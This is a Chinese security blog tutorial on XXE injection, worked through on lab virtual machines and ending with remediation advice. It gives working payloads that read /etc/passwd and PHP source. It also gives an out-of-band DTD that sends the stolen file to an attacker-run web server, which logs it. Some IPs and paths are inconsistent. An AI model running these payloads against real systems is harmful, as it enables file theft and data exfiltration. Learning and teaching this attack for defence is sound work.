浅谈 XXE 漏洞任意文件读取

最新推荐文章于 2024-06-21 15:55:50 发布
最新推荐文章于 2024-06-21 15:55:50 发布
阅读量3.8k 收藏 14
点赞数 3
分类专栏: 漏洞原理 文章标签: xml 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fengzilin1973/article/details/116355031
版权

浅谈 XXE 漏洞任意文件读取

文章目录

0x00 前言

XXE Injection即 XML External Entity Injection,也就是XML外部实体注入攻击。通过XML实体,“SYSTEM” 关键词导致 XML 解析器可以从本地文件或远程 URL 中读取数据,所以攻击者可以通过 XML 实体传递自己构造的恶意值,是处理程序解析它。

危害如下:

  • 读取任意文件
  • DOS拒绝服务攻击
  • 代理扫描内网端口
  • 执行系统命令等

0x01 XML 基础知识

1.什么是XML

XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言,XML文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素。

XML 设计宗旨是传输数据,而非显示数据,各种应用程序之间数据传输中最常用的工具。

2.XML 语法

2.1 语法规则
  • 所有元素都有一个闭合标签
  • 可以自定义标签和自己的文档结构
  • XML对大小写敏感
  • XML 正确嵌套
  • XML 属性值必须加 “”
  • XML中注释:<!-- 注释内容-->
  • XML中,5个预定义实体引用,如下:
实体实体符号含义
&lt;<小于
&gt;>大于
&amp;&和号
&apos;单引号
&quot;‘’引号
2.2 XML 结构
XML 文档声明,在文档的第一行
XML 文档类型定义,即DTD,XXE 漏洞所在的地方
XML 文档元素

image-20210427173413627

2.3 XML DTD(文档类型定义)

文档类型定义(DTD)可以是内部声明也可以引用外部 DTD

  • 内部声明 DTD 格式:<!DOCTYPE 根元素 [元素声明]>
  • 引用外部 DTD 格式:<!DOCTYPE 根元素 [元素声明]>

在DTD中进行实体声明时,将使用 ENTITY 关键字来声明。实体是用于定义引用普通稳定或特殊字符的快捷方式的变量。实体可在内部或外部进行声明

  • 内部声明实体格式:<!ENTITY 实体名称 "实体的值">
  • 引用外部实体格式:<!ENTITY 实体名称 SYSTEM "URL">

3.XML 注入时的两大要素

  • 标签闭合
  • 获取 XML 表结构

0x02 XXE 漏洞攻击

1.XXE 漏洞演示

XXE 漏洞攻击的测试地址: http://11.23.0.141/xxe.php

靶机:metasploitable2

xxe.php 代码

<?php 
$xml=file_get_contents("php://input"); 
$data = simplexml_load_string($xml) ; 
echo "<pre>" ; 
print_r($data) ;  
echo "</pre>" ; 
?>

打开burpsuite 截断

image-20210428104326525

payload 如下

<?xml version="1.0" encoding="utf-8"?>  

<!DOCTYPE xxe [ 
<!ELEMENT name ANY > 
<!ENTITY xxe SYSTEM "file:etc/passwd" >]> 
<root> 
<name>&xxe;</name> 
</root>

在上面的代码中, XML 外部实体(外部实体在 XML 中被引用) xxe 被赋予的值为:file:///etc/passwd。在解析 XML 文档的过程中,实体 ‘xxe’ 的值会被替换为URI(file://etc/passwd)内容值(也就是 passwd 文件的内容)。 关键字 ‘SYSTEM’ 会告诉 XML 解析器,‘xxe’ 实体的值将从其后的 URI 中读取,并把读取的内容替换 xxe 出现的地方。

将 GET 请求修改为 POST 请求,添加payload

image-20210428105520833

2.读取 PHP 文件

修改 payload 读取 xxe.php 文件,代码如下;

<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE xxe [ 
<!ELEMENT name ANY > 
<!ENTITY xxe SYSTEM "file:///xxe.php" >]> 
<root> 
<name>&xxe;</name> 
</root>

没有读取到文件内容,原因是 php 文件需要进行加密才能够被读取

image-20210428112319257

修改 payload 代码如下:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [ 
<!ELEMENT name ANY > 
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php" >]> 
<root> 
<name>&xxe;</name> 
</root>

image-20210428112429047

php 文件经过 base64 加密之后就可以正常读取了,在 Kali 中使用 base64 进行解密获取文本内容。

使用 burpsuite 解码 base64 结果为
image-20210428112554281

0x03 XXE 漏洞代码分析

xxe.php 源码

<?php 
$xml=file_get_contents("php://input"); 
$data = simplexml_load_string($xml) ; 
echo "<pre>" ; 
print_r($data) ;  
echo "</pre>" ; 
?>

代码解释

1.file_get_contents()

https://www.w3school.com.cn/php/func_filesystem_file_get_contents.asp

file_get_contents() 函数吧整个文件读入一个字符串中。获取客户端输入的内容

image-20210428094239046

php://input #是个可以访问请求的原始数据的只读流。

结合 file_get_contents(“php://input”) 可以读取POST提交的数据,存入 $xml

2.simplexml_load_string 函数介绍

php 中的 simplexml_load_string 函数将xml 格式字符串转换为对应的simpleXMLElementObject

3.XXE 注入的思路

  1. file_get_contents(“php://input”)可以读取 POST 提交的数据
  2. 那么我们通过 POST 提交 XML 代码,
  3. XML 代码中引用外部 DTD,读取黑客想要的系统文件
  4. 通过 simplexml_load_string()函数显示数据。

即通过 simplexml_load_string()函数将 XML 代码和引用的系统文件转换成 SimpleXMLElementObject 格式打印出来,此时加载的系统文件也会被打印出来。

0x04 无回显文件读取

1.实验环境介绍

将PentesterLab的 .iso 镜像直接导入即可

安装 PentesterLab 虚拟机

image-20210428113913759

查看IP 地址

192.168.159.133

image-20210428172032588

2.实验拓扑

image-20210428164617353

实验环境描述:Kali 作为黑客并建立黑客接受和提交数据的Web 站点,PentesterLab 作为 sever被攻击端

3.Kali 服务器准备工作

需要建立一个外部的 DTD 文件,一个用于接受数据的 PHP 文件,以及存储数据的数据文件。

3.1 建立 DTD 外部实体文件
┌──(root💀fengzilin55)-[~]
└─# cd /var/www/html 
                                                                                                         
┌──(root💀fengzilin55)-[/var/www/html]
└─# vim test.dtd

<!ENTITY % p1 SYSTEM "file:///etc/passwd"> 
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://192.168.159.132/xxe.php?pass=%p1;'>">%p2;

注:% p1 定义一个参数实体,%和 p1 之间有一个空格,用于接收 file:///etc/passwd 的内容,%p1 引用参数实体,参数实体只能在 DTD 文件中被引用。

3.2 建立 php 文件
┌──(root💀fengzilin55)-[/var/www/html]
└─# vim xxe.php 

<?php $pass=$_GET['pass']; file_put_contents('pass.txt',$pass); ?>
3.3 创建存储数据的文件
┌──(root💀fengzilin55)-[/var/www/html]
└─# touch pass.txt
3.4 修改文件权限
┌──(root💀fengzilin55)-[/var/www/html]
└─# chown -R www-data:www-data /var/www/html/*
3.5 启动 Apache2
┌──(root💀fengzilin55)-[/var/www/html]
└─# systemctl start apache2.service
3.6 测试 php 文件能够正常写入数据
┌──(root💀fengzilin55)-[/var/www/html]
└─# curl http://192.168.159.132/xxe.php?pass=1                                                                                                           ┌──(root💀fengzilin55)-[/var/www/html]
└─# cat pass.txt                              1

image-20210428183857629

4. 进行 XXE 攻击

Kali 中停止截断:

image-20210428184428376

访问 PentesterLab 地址:http://192.168.159.133

image-20210428184838844

开启 burpsuite 进行截断

image-20210428184921881

直接点击登录,不需要输入用户名密码

image-20210428185353529

使用 bp 将 get 请求改为 post 请求

image-20210428190853123

payload 代码

<?xml version="1.0"?> 
<!DOCTYPE e1 SYSTEM "http://192.168.1.53/test.dtd">
<foo>&e1;</foo>

抓到的包修改以下内容

改:Content-Type: application/x-www-form-urlencoded 
为:Content-Type: text/xml

image-20210428190740909

去 kali 主机上查看

┌──(root💀fengzilin55)-[/var/www/html]
└─# cat pass.txt

image-20210428190928685

0x05 XXE 漏洞修复建议

1.升级 libxml 版本

libxml 2.9.0以后,默认不解析外部实体,或者禁止使用外部实体.
http://www.linuxfromscratch.org/blfs/view/cvs/general/libxml2.html

image-20210428191153442

2.代码层防御

使用开发语言提供的禁用外部实体的方法

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false);

Python:

from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

过滤用户提交的 XML 数据
关键词:<!DOCTYPE 和<!ENTITY,或者,SYSTEM 和 PUBLIC。

0x06 总结

本章节学习了,XXE 的漏洞,以及介绍了 XML 是什么,以及无回显文件怎么读取的详细步骤

参考文档

https://www.freebuf.com/vuls/263348.html

丰梓林
关注
  • 3
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
XEE漏洞任意文件读取
m0_58001548的博客
04-30 1905
XXE全称是——XML External Entity,也就是XML外部实体注入攻击。通过 XML实体,"SYSTEM”关键词导致XML解析器可以从本地文件或者远程URI中读取数据。所以攻击者可以通过XML实体传递自己构造的恶意值,使处理程序解析它。当引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。XML指可扩展标记语言(Extensible Markup Language)XML是一种标记语言,很类似HTML。
文件读取 xxe_XXE
weixin_36165398的博客
01-14 732
一、 XXE是什么?有哪些危害?XML外部实体,允许XML引用外部数据作为变量。形式如下。]><user><username>&xxe;username><password>adminpassword>user>由于外部实体允许多种协议,所以XXE等同于任意文件读取+SSRFXXE靶场https://github....
实战项目 2 Linux-XXE 靶场渗透测试案例详解
最新发布
m0_50572593的博客
06-21 2012
XXE(xml external entity injection) 既"xml 外部实体注入漏洞"。概括一下就是"攻击者通过向服务器注入指定的 xml 实体内容,从而让服务器按照指定的配置进行执行,导致问题“也就是说服务端接收和解析了来自用户端的 xml 数据,而又没有做严格的安全控制,从而导致 xml 外部实体注入。造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起 dos 攻击等危害。
XXE文件随意读取
weixin_48421613的博客
09-03 1836
XXE的利用 声明: 我们本次实验所使用的php版本为5.4版本,有些版本是实验不成功的 XXE注入可分为有回显的与没有回显的 有回显的:制造一个具有xxe漏洞的代码(xxe.php) <?php $xml=simplexml_load_string($_GET['xml']); echo $xml; //这是有回显的xxe注入 ?> 首先我们使用我们本地的服务器进行探测,使用burpsuite进行抓板进行分析 我们可以看到我们提交的参数已经出
windows文件读取 xxe_XXE漏洞利用方式详解
weixin_35029653的博客
12-11 617
XXE漏洞的详细原理解释和利用中,XXE的基本原理还有简单的文件读取利用方式我们已经有了基本的了解,那么接下来就带来我们的XXE漏洞详解——进阶篇!xxe漏洞利用在实战中往往会遇到很多的问题,也需要更多种多样的利用方式和技巧,本片就给大家一一介绍~读取文件时有特殊符号在读取文件时,文件中包含"<,>,&"等这些特殊符号时,会被xml解析器解析,报错从而导致读取失败,例如尝试读...
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6453
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
文件读取 xxe_关于XML解析的外部实例引用漏洞攻击XXE
weixin_35914716的博客
01-15 470
XXE全称是——XML External Entity,也就是XML外部实体注入攻击。该漏洞的核心主要是在对不安全的外部实体数据进行处理时引发的安全攻击问题。如果攻击者可以上传XML文档、或HTTP通信过程中采用XML格式传输数据,并且能够在XML文档中添加恶意内容,他们就能够攻击含有缺陷的XML处理器。XXE漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXEXML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE漏洞利用 - 任意文件读取 XXEXml External Entity)漏洞是一种常见的安全漏洞,特别是在Web应用程序中广泛存在。XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件...
eyoucms V1.0.4 后台任意文件读取漏洞1
08-03
漏洞简介:易优cms企业建站系统是由php+mysql开发的一套专门用于中小企业网站建设的开源cms。可以用来快速建设一个企业网站( PC,手机,微信都可以访问
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
5、XXE漏洞pdf资料
10-15
XXE攻击者通过构造特殊的XML文档,可以利用XML解析器的弱点读取服务器上的任意文件、执行系统命令、探测内部网络以及攻击内部网络服务。 XML结构包含以下几个核心概念: 1. 元素:XML文档的基本构建块,由开始标记...
XXE读取文件 Geek10th
weixin_44377940的博客
11-14 993
点开网站: 抓包,修改属性: 返回了这么一串: 由于是$name==md5(),由弱类型比较和md5想到md5碰撞,
文件读取 xxe_漏洞笔记|记一次与XXE漏洞的爱恨纠缠
weixin_31641077的博客
01-15 410
0x01背景:kaiputenku大佬最近在挖洞的时候偶遇一枚XXE漏洞,身经百战的他经过一番爱恨纠缠,终将她顺利拿下~0x02纠缠一番只为她-Blind OOB XXE: 在测试某系统的某查询功能模块如下:查询模块.jpg(请各位大佬自行脑补)下面即将开始kaiputenku的表演:首先使用burp抓包,发现提交xml形式的数据包,很容易想到可能存在XML外部实体注入...
windows文件读取 xxe_Web应用常见漏洞浅析:XXE任意文件读写漏洞、远程代码执行……...
weixin_39551993的博客
12-22 613
原标题:Web应用常见漏洞浅析:XXE任意文件读写漏洞、远程代码执行…… 你的Web应用是否存在XXE漏洞? 如果你的应用是通过用户上传处理XML文件或POST请求(例如将SAML用于单点登录服务甚至是RSS)的,那么你很有可能会受到XXE的攻击。XXE是一种非常常见的漏洞类型,我们几乎每天都会碰到它。在去年的几次web应用渗透中,我们就成功的利用了好几回。什么是XXE“简单来说,XXE就是XML...
windows文件读取 xxe_XXE原理及利用
weixin_35387118的博客
12-21 1249
“一个人的伟大之处乃在于他是一座桥梁,而不是目的。By尼采”一XXE原理01XML 简介XML 指可扩展标记语言(EXtensible Markup Language),和HTML很类似,但XML的设计目的是传输数据而非显示数据,且XML没有预定义的标签,因此需要自行定义标签。下面是一个XML文档的实例。GeorgeJohnReminderDon't forget the meeting...
33-3 XXE漏洞 - XXE外部实体注入(文件读取
weixin_43263566的博客
04-02 307
这个XML文档看起来很简单,但实际上它包含了一种XML外部实体注入(XXE)攻击。通过在DTD中定义恶意实体并在XML文档中引用它们,攻击者可以利用XXE漏洞读取敏感文件、执行命令或进行其他恶意操作。实体可以在XML文档中被引用,类似于变量,在文档解析过程中会被替换为其定义的值。:这是DOCTYPE声明,用于指定XML文档的文档类型定义(DTD)。,但实际上它可以被定义为任何攻击者想要的内容,包括文件路径、命令等。:这是XML文档的声明部分,指定了XML版本和字符编码。:在DTD中定义了一个实体。
利用XXE漏洞读取PHP文件内容攻击如何防范
06-08
针对利用XXE漏洞读取PHP文件内容的攻击,可以采取以下措施: 1. 避免使用外部实体。禁用或限制XML解析器的外部实体,以防止攻击者利用外部实体注入恶意代码。 2. 使用白名单机制。限制XML解析器只能访问预先定义的实体,禁止访问不受信任的实体。 3. 过滤输入。在接收到XML数据之前,对输入数据进行过滤,以删除或转义可能包含恶意代码的字符。 4. 更新XML解析器。使用最新版本的XML解析器,因为较新版本通常包含针对XXE攻击的修复程序。 5. 禁止远程文件访问。禁止XML解析器访问远程文件,以防止攻击者利用XXE漏洞读取PHP文件内容等敏感信息。 6. 隔离PHP文件。将PHP文件与其他文件隔离开来,以确保攻击者无法利用XXE漏洞读取PHP文件内容。 以上措施可以帮助防止利用XXE漏洞读取PHP文件内容的攻击,保护系统的安全。但是,最好的方法是使用安全的编程实践和审查代码,以防止XXE漏洞的出现。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值